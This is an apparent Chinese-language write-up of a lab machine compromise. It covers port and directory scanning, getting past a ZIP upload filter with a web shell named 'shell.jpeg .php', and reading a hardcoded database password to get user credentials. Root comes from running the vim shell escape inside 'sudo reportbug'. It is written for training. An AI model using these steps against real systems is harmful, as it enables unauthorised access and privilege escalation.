信息收集

IP=192.168.0.196
nmap $IP

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开了两个端口，打开网页看一眼。是一个咖啡豆的网站。
扫一波目录

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://$IP -x php,txt,html,bk,bak,zip,tar,gz,7z -t 50


/images               (Status: 301) [Size: 315] [--> http://192.168.0.196/images/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.0.196/js/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.0.196/css/]
/contact.php          (Status: 200) [Size: 11753]
/blog.php             (Status: 200) [Size: 12490]
/uploads              (Status: 301) [Size: 316] [--> http://192.168.0.196/uploads/]
/upload.php           (Status: 500) [Size: 0]
/about.php            (Status: 200) [Size: 10538]
/index.php            (Status: 200) [Size: 29170]
/fonts                (Status: 301) [Size: 314] [--> http://192.168.0.196/fonts/]
/service.php          (Status: 200) [Size: 12239]
/report.php           (Status: 200) [Size: 13]
/icon                 (Status: 301) [Size: 313] [--> http://192.168.0.196/icon/]
/server-status        (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/testimonial.php      (Status: 200) [Size: 17014]
/choose.php           (Status: 200) [Size: 1908]

映入眼帘的就是 /upload.php ，不过看状态码是 500，应该是接收页面，那么盲猜 choose.php 就是选择文件页面了？果然。让传一个 ZIP 文件，里面放 jpeg 文件？
打开 burpsuite , 先传一个正经的 zip 文件。
返回 File 3.jpeg.zip has been uploaded. 此时去看，http://192.168.0.196/uploads/，里面我的 3.jpeg 已经被解压出来了。

那如果我放一个 shell.php 进去呢？

得到了提示：
File shell.gif.php.zip has been uploaded.Archive contains non-JPEG files. It will be deleted.
不是 jpeg 的文件，会被删掉，看到这个提示的第一反应，是It will be deleted.，的话，说明会存在一会？用条件竞争？但是转念一想，这个不一定是解压出来的。所以还需要尝试下检测的方式已经如何绕过。
先尝试是否是文件扩展名检测,试了好几个，shell.jpeg .php 成功了。

再次访问 http://192.168.0.196/uploads/ 里面就有 shell.jpeg .php 了。打开本地监听，访问这个文件，拿到了 shell。

1
2
3

pwncat-cs -lp 1234
(remote) www-data@zon:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

sudo -l 需要密码，简单翻了下定时任务,没东西。
/home/freddie 家目录没权限看。

/var/www/html 下有一个 hashDB.sh 貌似有东西：

#!/bin/bash

# script that checks the database's integrity every minute

dump=/dev/shm/dump.sql
log=/var/log/db_integrity_check.log
true > "${log}"

/usr/bin/mysqldump -u admin -pudgrJbFc6Av#U3 admin credentials > "${dump}"
/usr/bin/sed -i '$d' "${dump}"

hash="29d8e6b76aab0254f7fe439a6a5d2fba64270dde087e6dfab57fa57f6749858a"
check_hash=$(sha256sum "${dump}" | awk '{print $1}')

if [[ "${hash}" != "${check_hash}" ]] ; then
  /usr/bin/wall "Alert ! Database hacked !"
  /usr/bin/du -sh /var/lib/mysql >> "${log}"
  /usr/bin/vmstat 1 3 >> "${log}"
else
  /usr/bin/sync && /usr/bin/echo 3 > /proc/sys/vm/drop_caches
  /usr/bin/echo "$(date) : Integrity check completed for ${dump}" >> "${log}"
fi

看到了数据库的密码，尝试登录下:

(remote) www-data@zon:/var/www/html$ mysql -u admin -pudgrJbFc6Av#U3
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.11.4-MariaDB-1~deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| admin              |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.008 sec)

MariaDB [(none)]> use admin
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [admin]> show tablesl;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'tablesl' at line 1
MariaDB [admin]> show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| credentials     |
+-----------------+
1 row in set (0.000 sec)

MariaDB [admin]> select * from credentials
    -> ;
+----------+-------------------------+
| username | password                |
+----------+-------------------------+
| Freddie  | LDVK@dYiEa2I1lnjrEeoMif |
+----------+-------------------------+
1 row in set (0.001 sec)

拿到了 Freddie 的密码，尝试登录，成功。

(remote) www-data@zon:/var/www/html$ su freddie        
Password: 
╰─$ id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),100(users)

╭─freddie@zon /var/www/html 
╰─$ sudo -l
sudo: unable to resolve host zon: Name or service not known
Matching Defaults entries for freddie on zon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User freddie may run the following commands on zon:
    (ALL : ALL) NOPASSWD: /usr/bin/reportbug

/usr/bin/reportbug 貌似是上报 bug 的工具。

1	sudo /usr/bin/reportbug

第一次执行的时候，会让你做一些基本配置。然后再执行一次。

sudo /usr/bin/reportbug                                                                          1 ↵
sudo: unable to resolve host zon: Name or service not known
Running 'reportbug' as root is probably insecure! Continue [y|N|q|?]? y
Please enter the name of the package in which you have found a problem, or type 'other' to report a more
general problem. If you don't know what package the bug is in, please contact debian-
[email protected] for assistance.
> other
Please enter the name of the package in which you have found a problem, or choose one of these bug
categories:

 1 bugs.debian.org          The bug tracking system, @bugs.debian.org
 2 buildd.debian.org        Problems and requests related to the Debian Buildds
 3 buildd.emdebian.org      Problems related to building packages for Emdebian
 4 cdimage.debian.org       CD Image issues
 5 cdrom                    Installation system
 6 cloud.debian.org         Issues involving Debian images for public/private clouds
 7 contributors.debian.org  Issues with the Debian Contributors Website and coordination of maintenance
 8 d-i.debian.org           Issues regarding the d-i.debian.org service and general Debian Installer
                            tasks
 9 debian-i18n              Requests regarding Internationalization (i18n) of the distribution
10 debian-live              General problems with Debian Live systems
11 ftp.debian.org           Problems with the FTP site and Package removal requests
12 general                  General problems (e.g. "many manpages are mode 755")
13 installation-reports     Reports of installation problems with stable & testing
14 jenkins.debian.org       Issues with the jenkins.debian.org service
15 lists.debian.org         The mailing lists, debian-*@lists.debian.org
16 manpages.debian.org      Issues with the Debian Manpages Website and coordination of maintenance
17 mirrors                  Problems with the official mirrors
18 nm.debian.org            New Member process and nm.debian.org webpages
19 pet.debian.net           The Debian Package Entropy Tracker
20 piuparts.debian.org      Issues with the piuparts.debian.org service
21 press                    Press release issues
22 project                  Problems related to project administration
23 qa.debian.org            The Quality Assurance group
24 release-notes            Problems with the Release Notes
25 release.debian.org       Requests regarding Debian releases and release team tools
26 rtc.debian.org           Issues in the operation of the Debian RTC services which are not package-
                            specific bugs
27 security-tracker         The Debian Security Bug Tracker
28 security.debian.org      The Debian Security Team
29 snapshot.debian.org      Issues with the snapshot.debian.org service
30 spam                     Spam (reassign spam to here so we can complain about it)
31 sponsorship-requests     Requests for package review and sponsorship
32 sso.debian.org           Problems and requests related to the Debian Single Sign On system
33 summit.debconf.org       Problems and requests related to the DebConf Summit instance
34 tech-ctte                The Debian Technical Committee (see the Constitution)
35 tracker.debian.org       Issues with the Debian Package Tracker and coordination of its maintenance
36 upgrade-reports          Reports of upgrade problems for stable & testing
37 wiki.debian.org          Problems with the Debian wiki
38 wnpp                     Work-Needing and Prospective Packages list
39 www.debian.org           Problems with the WWW site

Enter a package: 1
Are you reporting a problem with this program (reportbug) [Y|n|q|?]? Y
*** Welcome to reportbug.  Use ? for help at prompts. ***
Note: bug reports are publicly archived (including the email address of the submitter).
Detected character set: UTF-8
Please change your locale if this is incorrect.

Using 'root <[email protected]>' as your from address.
Getting status for reportbug...
Checking for newer versions at madison and https://ftp-master.debian.org/new.html

Your version (12.0.0) of reportbug appears to be out of date.
The following newer release(s) are available in the Debian archive:
  testing: 13.0.1
  unstable: 13.0.1
Please try to verify if the bug you are about to report is already addressed by these releases.  Do you still want to file a report [y|N|q|?]? y
Will send report to Debian (per lsb_release).
Querying Debian BTS for reports on reportbug src:reportbug...
132 bug reports found:

Bugs with severity important
    1)  #786740  apt-listbugs: Get errors while trying to download bugs E: Input/output error @ io_fillbu
    2)  #786748  bugs.debian.org: some SOAP requests to bugs.debian.org hang
    3)  #853915  reportbug: Retrieved base64 messages aren't decoded
    4)  #987334  reportbug: replying via "x - Provide extra information" breaks threading, In-Reply-To/Re
(1-4/132) Is the bug you found listed above [y|N|b|m|r|q|s|f|e|?]? 1
Retrieving report #786740 from Debian bug tracking system...

第二次执行的时候，就会进入一个vim 的界面，这个时候，可以输入 !sh 就可以拿到 root shell 了。

1 2	id uid=0(root) gid=0(root) groups=0(root)